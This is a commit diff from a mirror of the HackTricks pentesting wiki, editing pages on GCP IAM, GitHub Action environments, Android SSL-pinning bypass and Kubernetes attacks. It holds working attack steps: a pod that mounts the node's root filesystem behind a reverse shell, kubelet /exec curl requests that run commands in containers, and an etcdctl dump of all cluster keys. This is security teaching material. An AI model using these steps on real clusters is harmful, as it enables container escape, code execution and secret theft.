mirror of

https://github.com/carlospolop/hacktricks

synced 2025-02-18 15:08:29 +00:00

GitBook: [#2908] No subject

This commit is contained in:

parent

25122581e9

commit

9de57df230

9 changed files with 152 additions and 64 deletions

BIN

.gitbook/assets/image (637) (1).png

Normal file

BIN

.gitbook/assets/image (637) (1).png

Normal file

Binary file not shown.

|

After Width: | Height: | Size: 68 KiB |

Binary file not shown.

|

Before Width: | Height: | Size: 68 KiB After Width: | Height: | Size: 102 KiB |

|

|

@ -213,7 +213,7 @@

|

|||

* [Pentesting Kubernetes](pentesting/pentesting-kubernetes/README.md)

|

||||

* [Kubernetes Enumeration](pentesting/pentesting-kubernetes/enumeration-from-a-pod.md)

|

||||

* [Abusing Roles/ClusterRoles](pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md)

|

||||

* [Pentesting Kubernetes from the outside](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)

|

||||

* [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)

|

||||

* [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)

|

||||

* [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)

|

||||

* [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)

|

||||

|

|

|

|||

|

|

@ -17,14 +17,6 @@ Organization

|

|||

|

||||

A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.

|

||||

|

||||

### **IAM Policies, Bindings and Memberships**

|

||||

|

||||

In GCP there are different ways to grant a principal access over a resource:

|

||||

|

||||

* **Memberships**: You set **principals as members of roles** with **no restrictions** on the role or the principals. You can add a user as a member of a role, add a group as a member of the same role, and also make those principals (user and group) members of other roles.
* **Bindings**: Several **principals can be bound to a role**. Those **principals can still be bound to, or be members of, other roles**. However, if a principal that isn't part of the binding is set as a **member of the bound role**, the **membership will disappear the next time the binding is applied**.
* **Policies**: A policy is **authoritative**: it lists roles and principals, and **those principals cannot hold more roles and those roles cannot have more principals** unless that policy is modified (not even through other policies, bindings or memberships). Therefore, when a role or principal is specified in a policy, all its privileges are **limited by that policy**. This can be bypassed if the principal is allowed to modify the policy or holds privilege escalation permissions (for example, the ability to create a new principal and bind a new role to it).

|

||||

|

||||

### **IAM Roles**

|

||||

|

||||

There are **three types** of roles in IAM:

|

||||

|

|

@ -78,6 +70,14 @@ gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]

|

|||

|

||||

IAM policies indicate the permissions principals have over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used or which features are enabled or disabled**. This helps enforce least privilege for each resource in the GCP environment.

|

||||

|

||||

### **Terraform IAM Policies, Bindings and Memberships**

|

||||

|

||||

As defined by Terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam), when using Terraform with GCP there are different ways to grant a principal access over a resource:

|

||||

|

||||

* **Memberships** (`google_project_iam_member`): You set **principals as members of roles** with **no restrictions** on the role or the principals. You can add a user as a member of a role, add a group as a member of the same role, and also make those principals (user and group) members of other roles.
* **Bindings** (`google_project_iam_binding`): Several **principals can be bound to a role**. Those **principals can still be bound to, or be members of, other roles**. However, if a principal that isn't part of the binding is set as a **member of the bound role**, the **membership will disappear the next time the binding is applied**.
* **Policies** (`google_project_iam_policy`): A policy is **authoritative**: it lists roles and principals, and **those principals cannot hold more roles and those roles cannot have more principals** unless that policy is modified (not even through other policies, bindings or memberships). Therefore, when a role or principal is specified in a policy, all its privileges are **limited by that policy**. This can be bypassed if the principal is allowed to modify the policy or holds privilege escalation permissions (for example, the ability to create a new principal and bind a new role to it).
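
Outside Terraform, the same additive-versus-authoritative distinction can be sketched with `gcloud`. This is only an illustration and not part of the Terraform provider: `add-iam-policy-binding` adds one member to one role and leaves the rest of the policy alone (closest to a membership), while `set-iam-policy` replaces the whole policy with the file you pass (closest to an authoritative policy). The function names, project ID, member and file name are placeholders chosen for this example.

```bash
#!/usr/bin/env bash
# Sketch only: both functions print the gcloud command instead of running it,
# so the effect can be reviewed first. All argument values are placeholders.

# Additive: grants ROLE to MEMBER and keeps every other binding in place.
iam_additive_cmd() {
  local project="$1" member="$2" role="$3"
  printf 'gcloud projects add-iam-policy-binding %s --member=%s --role=%s\n' \
    "$project" "$member" "$role"
}

# Authoritative: replaces the whole project policy with POLICY_FILE,
# dropping any binding that is not listed in that file.
iam_authoritative_cmd() {
  local project="$1" policy_file="$2"
  printf 'gcloud projects set-iam-policy %s %s\n' "$project" "$policy_file"
}
```

For example, `iam_additive_cmd my-project user:alice@example.com roles/viewer` prints the additive command for a hypothetical user; an authoritative change should always be reviewed against the current policy before it is applied.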

|

||||

|

||||

### **Service accounts**

|

||||

|

||||

Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:

|

||||

|

|

|

|||

|

|

@ -180,6 +180,19 @@ Once configured in the repo or the organizations **users of github won't be able

|

|||

|

||||

Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).

|

||||

|

||||

### Git Environments

|

||||

|

||||

GitHub allows you to create **environments** where you can save **secrets**. Then, you can give the GitHub Action access to the secrets inside the environment with something like:

|

||||

|

||||

```yaml
jobs:
  deployment:
    runs-on: ubuntu-latest
    environment: env_name
```

|

||||

|

||||

You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.

|

||||

|

||||

### Git Action Box

|

||||

|

||||

A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.

|

||||

|

|

|

|||

|

|

@ -394,7 +394,7 @@ It's recommended to **apply SSL Pinning** for the sites where sensitive informat

|

|||

First of all, you should (must) **install the certificate** of the **proxy** tool that you are going to use, probably Burp. If you don't install the CA certificate of the proxy tool, you probably aren't going to see the encrypted traffic in the proxy.\

|

||||

**Please,** [**read this guide to learn how to install a custom CA certificate**](android-burp-suite-settings.md)**.**

|

||||

|

||||

For applications targeting **API Level 24+ it isn't enough to install the Burp CA** certificate in the device. To bypass this new protection you need to modify the Network Security Config file. So, you could modify this file to authorise your CA certificate or you can **\*\*\[**read this page for a tutorial on how to force the application to accept again all the installed certificate sin the device**]\(make-apk-accept-ca-certificate.md)**.\*\*

|

||||

For applications targeting **API Level 24+ it isn't enough to install the Burp CA** certificate in the device. To bypass this protection you need to modify the Network Security Config file. You can either modify this file to authorise your CA certificate or [**read this page for a tutorial on how to force the application to accept again all the certificates installed in the device**](make-apk-accept-ca-certificate.md).

|

||||

|

||||

#### SSL Pinning

|

||||

|

||||

|

|

@ -405,6 +405,7 @@ Here I'm going to present a few options I've used to bypass this protection:

|

|||

* You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)

|

||||

* You can also try to **automatically bypass SSL Pinning** using [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`

|

||||

* You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** (explained below)

|

||||

* If you still think that there is some traffic that you aren't capturing you can try to **forward the traffic to burp using iptables**. Read this blog: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
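
As a rough sketch of the iptables option in the last bullet: the helper below prints NAT rules that redirect outgoing HTTP/HTTPS traffic to a Burp listener. It assumes a rooted device or emulator where `iptables` is available and a Burp listener configured for invisible proxying; the function name, IP and port are placeholders, and the linked blog post may use a different rule set.

```bash
#!/usr/bin/env bash
# Sketch: print (not apply) DNAT rules that send outgoing traffic on
# ports 80 and 443 to a Burp listener. Review before running on the device.
burp_redirect_rules() {
  local burp_ip="$1" burp_port="$2" port
  for port in 80 443; do
    printf 'iptables -t nat -A OUTPUT -p tcp --dport %s -j DNAT --to-destination %s:%s\n' \
      "$port" "$burp_ip" "$burp_port"
  done
}
```

Running `burp_redirect_rules 192.168.1.10 8080` prints one rule per port; the printed lines can then be executed in a root shell on the device. Pinning still has to be bypassed separately, since redirection only makes sure the traffic reaches the proxy.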

|

||||

|

||||

#### Common Web vulnerabilities

|

||||

|

||||

|

|

|

|||

|

|

@ -20,6 +20,14 @@ You can check this **docker breakouts to try to escape** from a pod you have com

|

|||

[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)

|

||||

{% endcontent-ref %}

|

||||

|

||||

If you managed to escape from the container there are some interesting things you will find in the node:

|

||||

|

||||

* The **Kubelet** service listening

|

||||

* The **Kube-Proxy** service listening

|

||||

* The **Container Runtime** process (Docker)

|

||||

* More **pods/containers** running on the node that you can abuse like this one (more tokens)

|

||||

* The whole **filesystem** and **OS** in general

|

||||

|

||||

### Abusing Kubernetes Privileges

|

||||

|

||||

As explained in the section about **kubernetes enumeration**:

|

||||

|

|

@ -73,6 +81,12 @@ nmap-kube-discover () {

|

|||

nmap-kube-discover

|

||||

```

|

||||

|

||||

Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**:

|

||||

|

||||

{% content-ref url="pentesting-kubernetes-from-the-outside.md" %}

|

||||

[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md)

|

||||

{% endcontent-ref %}

|

||||

|

||||

### Sniffing

|

||||

|

||||

If the **compromised pod is running a sensitive service** that other pods need to authenticate to, you might be able to obtain the credentials sent by those pods.

|

||||

|

|

|

|||

|

|

@ -54,7 +54,7 @@ curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1

|

|||

|

||||

|

||||

|

||||

### Pod Creation

|

||||

### Pod Creation - Steal Token

|

||||

|

||||

An attacker with permission to create a pod in the “kube-system” namespace can, for example, create cryptomining containers. Moreover, if there is a **service account with privileged permissions, running a pod with that service account lets the attacker abuse those permissions to escalate privileges**.

|

||||

|

||||

|

|

@ -91,11 +91,11 @@ So just create the malicious pod and expect the secrets in port 6666:

|

|||

|

||||

.png>)

|

||||

|

||||

### **Pod Creationv2**

|

||||

### **Pod Creation - Mount Root (pod escape)**

|

||||

|

||||

With Pod create permissions over kube-system you may also be able to mount directories from the node hosting the pods, using a pod template like the following one:

|

||||

|

||||

{% code title="steal_etc.yaml" %}

|

||||

{% code title="mount_root.yaml" %}

|

||||

```yaml

|

||||

apiVersion: v1

|

||||

kind: Pod

|

||||

|

|

@ -113,17 +113,17 @@ spec:

|

|||

volumes:

|

||||

- name: volume

|

||||

hostPath:

|

||||

path: /etc

|

||||

path: /

|

||||

```

|

||||

{% endcode %}

|

||||

|

||||

Create the pod with:

|

||||

|

||||

```bash

|

||||

kubectl --token $token create -f abuse2.yaml

|

||||

kubectl --token $token create -f mount_root.yaml

|

||||

```

|

||||

|

||||

And capturing the reverse shell you can find the `/etc` directory of the node mounted in `/mnt` inside the pod.

|

||||

After catching the reverse shell, you will find the node's `/` directory (the entire filesystem) mounted at `/mnt` inside the pod.
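
Once inside the pod, a quick sanity check can confirm that the mount really is the node's filesystem. The sketch below is an assumption-laden helper, not part of the original technique: it looks for `/var/lib/kubelet` (the kubelet's default data directory) or `/etc/kubernetes` (used by kubeadm-style installs) under the mount point, and both paths may differ on other distributions.

```bash
#!/usr/bin/env bash
# Sketch: return 0 when DIR looks like a Kubernetes node root filesystem.
# The two marker directories are common defaults, not guarantees.
looks_like_node_root() {
  local dir="$1"
  [ -d "${dir}/var/lib/kubelet" ] || [ -d "${dir}/etc/kubernetes" ]
}
```

A typical use would be `looks_like_node_root /mnt && chroot /mnt /bin/sh`, which only works if the pod runs as root and the node has a shell at that path.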

|

||||

|

||||

### Sniffing **with a sidecar proxy app**

|

||||

|

||||

|

|

|

|||

|

|

@ -1,76 +1,90 @@

|

|||

# Pentesting Kubernetes from the outside

|

||||

# Pentesting Kubernetes Services

|

||||

|

||||

There are different ways to find **Kubernetes** Pods exposed to the Internet.

|

||||

Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**.

|

||||

|

||||

## Finding exposed pods with OSINT

|

||||

|

||||

One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh/) to find subdomains related to kubernetes. Another way might be to search `"k8s.%.com"` in github and search for **YAML files** containing the string.

|

||||

One approach is to search for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh) to find subdomains related to Kubernetes. Another is to search GitHub for `"k8s.%.com"` and look for **YAML files** containing the string.
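
The crt.sh search can also be scripted. The sketch below only builds the query URL; it assumes crt.sh's `q` and `output=json` query parameters and the `%` wildcard behave as they do in the web form, and the function name is made up for this example.

```bash
#!/usr/bin/env bash
# Sketch: build a crt.sh query URL for an identity pattern such as k8s.%.com.
crtsh_query_url() {
  local pattern="$1" encoded
  # '%' is the wildcard in the pattern and must be sent as %25 in a URL.
  encoded="$(printf '%s' "$pattern" | sed 's/%/%25/g')"
  printf 'https://crt.sh/?q=%s&output=json\n' "$encoded"
}
```

The result can be fetched with `curl -s "$(crtsh_query_url 'k8s.%.com')"` and filtered for host names with any JSON tool.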

|

||||

|

||||

## Finding Exposed pods via port scanning

|

||||

|

||||

The following ports might be open in a Kubernetes cluster:

|

||||

|

||||

| Port | Process | Description |
| :--- | :--- | :--- |
| 443/TCP | kube-apiserver | Kubernetes API port |
| 2379/TCP | etcd | |
| 6666/TCP | etcd | etcd |
| 4194/TCP | cAdvisor | Container metrics |
| 6443/TCP | kube-apiserver | Kubernetes API port |
| 8443/TCP | kube-apiserver | Minikube API port |
| 8080/TCP | kube-apiserver | Insecure API port |
| 10250/TCP | kubelet | HTTPS API which allows full mode access |
| 10255/TCP | kubelet | Unauthenticated read-only HTTP port: pods, running pods and node state |
| 10256/TCP | kube-proxy | Kube Proxy health check server |
| 9099/TCP | calico-felix | Health check server for Calico |
| 6782-4/TCP | weave | Metrics and endpoints |

|

||||

| Port       | Process        | Description                                                            |
| ---------- | -------------- | ---------------------------------------------------------------------- |
| 443/TCP    | kube-apiserver | Kubernetes API port                                                    |
| 2379/TCP   | etcd           |                                                                        |
| 6666/TCP   | etcd           | etcd                                                                   |
| 4194/TCP   | cAdvisor       | Container metrics                                                      |
| 6443/TCP   | kube-apiserver | Kubernetes API port                                                    |
| 8443/TCP   | kube-apiserver | Minikube API port                                                      |
| 8080/TCP   | kube-apiserver | Insecure API port                                                      |
| 10250/TCP  | kubelet        | HTTPS API which allows full mode access                                |
| 10255/TCP  | kubelet        | Unauthenticated read-only HTTP port: pods, running pods and node state |
| 10256/TCP  | kube-proxy     | Kube Proxy health check server                                         |
| 9099/TCP   | calico-felix   | Health check server for Calico                                         |
| 6782-4/TCP | weave          | Metrics and endpoints                                                  |
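
To check a host for the ports in the table, something like the following sketch could be used. It only prints an `nmap` command for review; the function and variable names are invented for this example, and `6782-4` from the table is read here as the range 6782-6784, which is an interpretation rather than something the table states.

```bash
#!/usr/bin/env bash
# Sketch: ports taken from the table above (6782-4 read as 6782-6784).
K8S_PORTS="443,2379,4194,6443,6666,6782-6784,8080,8443,9099,10250,10255,10256"

# Print an nmap command that checks only those ports on TARGET.
# -n: no DNS resolution, -Pn: skip host discovery, --open: show open ports only.
kube_scan_cmd() {
  local target="$1"
  printf 'nmap -n -Pn --open -p %s %s\n' "$K8S_PORTS" "$target"
}
```

`kube_scan_cmd 10.0.0.5` prints the command for a single placeholder address; a CIDR range can be passed in the same position.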

|

||||

|

||||

#### cAdvisor

|

||||



### Kube-apiserver

|

||||

|

||||

This is the **Kubernetes API service** that administrators usually talk to using the tool **`kubectl`**.

|

||||

|

||||

**Common ports: 6443 and 443**, but also 8443 in minikube and 8080 as insecure.

|

||||

|

||||

```text

|

||||

curl -k https://<IP Address>:4194

|

||||

```

|

||||

|

||||

#### Insecure API server

|

||||

|

||||

```text

|

||||

curl http://<IP Address>:8080

|

||||

```

|

||||

|

||||

#### Secure API Server

|

||||

|

||||

```text

|

||||

curl -k https://<IP Address>:(8|6)443/swaggerapi

|

||||

curl -k https://<IP Address>:(8|6)443/healthz

|

||||

curl -k https://<IP Address>:(8|6)443/api/v1

|

||||

```

|

||||

|

||||

#### etcd API

|

||||

**Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:**

|

||||

|

||||

```text

|

||||

curl -k https://<IP address>:2379

|

||||

curl -k https://<IP address>:2379/version

|

||||

etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only

|

||||

```

|

||||

{% content-ref url="enumeration-from-a-pod.md" %}

|

||||

[enumeration-from-a-pod.md](enumeration-from-a-pod.md)

|

||||

{% endcontent-ref %}

|

||||

|

||||

### Kubelet API

|

||||

|

||||

This service **runs on every node of the cluster**. It's the service that **controls** the pods inside the **node**. It talks with the **kube-apiserver**.

|

||||

|

||||

If you find this service exposed you might have found an [**unauthenticated RCE**](pentesting-kubernetes-from-the-outside.md#kubelet-rce).

|

||||

|

||||

#### Kubelet API

|

||||

|

||||

```text

|

||||

```

|

||||

curl -k https://<IP address>:10250

|

||||

curl -k https://<IP address>:10250/metrics

|

||||

curl -k https://<IP address>:10250/pods

|

||||

```

|

||||

|

||||

#### kubelet \(Read only\)

|

||||

#### kubelet (Read only)

|

||||

|

||||

```text

|

||||

```

|

||||

curl http://<IP Address>:10255
curl http://<external-IP>:10255/pods

|

||||

```

|

||||

|

||||

### Remote Cluster Misconfigurations

|

||||

### cAdvisor

|

||||

|

||||

By **default**, API endpoints are **forbidden** to **anonymous** access. But it’s always a good idea to check if there are any **insecure endpoints that expose sensitive information**:

|

||||

Service useful to gather metrics.

|

||||

|

||||

```

|

||||

curl -k https://<IP Address>:4194

|

||||

```

|

||||

|

||||

#### etcd API

|

||||

|

||||

```

|

||||

curl -k https://<IP address>:2379

|

||||

curl -k https://<IP address>:2379/version

|

||||

etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only

|

||||

```

|

||||

|

||||

## Vulnerable Misconfigurations

|

||||

|

||||



### Kube-apiserver Anonymous Access

|

||||

|

||||

By **default**, **kube-apiserver** API endpoints are **forbidden** to **anonymous** access. But it’s always a good idea to check if there are any **insecure endpoints that expose sensitive information**:

|

||||

|

||||

|

||||

|

||||

|

|

@ -78,15 +92,62 @@ By **default**, API endpoints are **forbidden** to **anonymous** access. But it

|

|||

|

||||

ETCD stores the cluster secrets, configuration files and other **sensitive data**. By **default**, ETCD **cannot** be accessed **anonymously**, but it is always good to check.

|

||||

|

||||

If the ETCD can be accessed anonymously, you may need to use the [etcdctl](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) tool. The following command will get all the keys stored:

|

||||

If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored:

|

||||

|

||||

```text

|

||||

etcdctl --ndpoints=http://<MASTER-IP>:2379 get / –prefix –keys-only

|

||||

```

|

||||

etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only

|

||||

```

|

||||

|

||||

### **Checking Kubelet \(Read Only Port\) Information Exposure**

|

||||

### **Kubelet RCE**

|

||||

|

||||

When the “kubelet” read-only port is exposed, the attacker can retrieve information from the API. This exposes **cluster configuration elements, such as pods names, location of internal files and other configurations**. This is not critical information, but it still should not be exposed to the internet.

|

||||

The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous access** to the service is **allowed:**

|

||||

|

||||

.png>)

|

||||

|

||||

The **Kubelet** service **API is not documented**, but its source code is public, and finding the exposed endpoints is as easy as **running**:

|

||||

|

||||

```bash

|

||||

curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/'

|

||||

|

||||

Path("/pods").

|

||||

Path("/run")

|

||||

Path("/exec")

|

||||

Path("/attach")

|

||||

Path("/portForward")

|

||||

Path("/containerLogs")

|

||||

Path("/runningpods/").

|

||||

```

|

||||

|

||||

All of them sound interesting.

|

||||

|

||||

#### /pods

|

||||

|

||||

This endpoint lists pods and their containers:

|

||||

|

||||

```bash

|

||||

curl -ks https://worker:10250/pods

|

||||

```

|

||||

|

||||

#### /exec

|

||||

|

||||

This endpoint makes it very easy to execute code inside any container:

|

||||

|

||||

```bash

|

||||

# The command is passed as an array (split by spaces), and this is a GET request.

|

||||

curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} \

|

||||

-d 'input=1' -d 'output=1' -d 'tty=1' \

|

||||

-d 'command=ls' -d 'command=/'

|

||||

```
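
The same request can be expressed as a single URL, since `curl -G` simply appends the `-d` pairs to the query string. The helper below is a sketch with a made-up name; it appends each command word as-is, so it only suits simple commands whose words need no URL-encoding.

```bash
#!/usr/bin/env bash
# Sketch: build the kubelet /exec URL for NODE, NAMESPACE, POD, CONTAINER
# followed by the command words (one "command=" parameter per word).
kubelet_exec_url() {
  local node="$1" ns="$2" pod="$3" container="$4" word url
  shift 4
  url="https://${node}:10250/exec/${ns}/${pod}/${container}?input=1&output=1&tty=1"
  for word in "$@"; do
    url="${url}&command=${word}"
  done
  printf '%s\n' "$url"
}
```

For instance, `curl -ks "$(kubelet_exec_url worker default nginx web ls /)"` would send the equivalent of the request above for a hypothetical `nginx` pod with a `web` container in the `default` namespace.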

|

||||

|

||||

To automate the exploitation you can also use the script [**kubelet-anon-rce**](https://github.com/serain/kubelet-anon-rce).

|

||||

|

||||

{% hint style="info" %}

|

||||

To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth=false` and the service should be segregated at the network level.

|

||||

{% endhint %}
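
To get a first impression of how a kubelet is configured, the HTTP status returned to an unauthenticated request can be interpreted roughly as in the sketch below. The mapping is an assumption based on common kubelet behaviour (401 when anonymous authentication is disabled, 403 when the anonymous request is accepted but denied by authorization) and should be confirmed against the target; the function name is invented for this example.

```bash
#!/usr/bin/env bash
# Sketch: map the HTTP status of an unauthenticated kubelet request
# to a likely configuration. Treat the result as a hint, not a verdict.
kubelet_auth_state() {
  case "$1" in
    200) echo "anonymous access allowed" ;;
    401) echo "anonymous auth disabled" ;;
    403) echo "anonymous request accepted but not authorized" ;;
    *)   echo "inconclusive (HTTP $1)" ;;
  esac
}
```

It can be fed directly from curl, for example `kubelet_auth_state "$(curl -ks -o /dev/null -w '%{http_code}' https://worker:10250/pods)"`, where `worker` is a placeholder host name.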

|

||||

|

||||

### **Checking Kubelet (Read Only Port) Information Exposure**

|

||||

|

||||

When the **kubelet read-only port** is exposed, an attacker can retrieve information from the API. This exposes **cluster configuration elements, such as pod names, locations of internal files and other configuration**. This is not critical information, but it still should not be exposed to the Internet.

|

||||

|

||||

For example, a remote attacker can abuse this by accessing the following URL: `http://<external-IP>:10255/pods`

|

||||

|

||||

|

|

@ -96,5 +157,4 @@ For example, a remote attacker can abuse this by accessing the following URL: `h

|

|||

|

||||

{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2" %}

|

||||

|

||||

|

||||

|

||||

{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %}

|

||||

|

|

|

|||
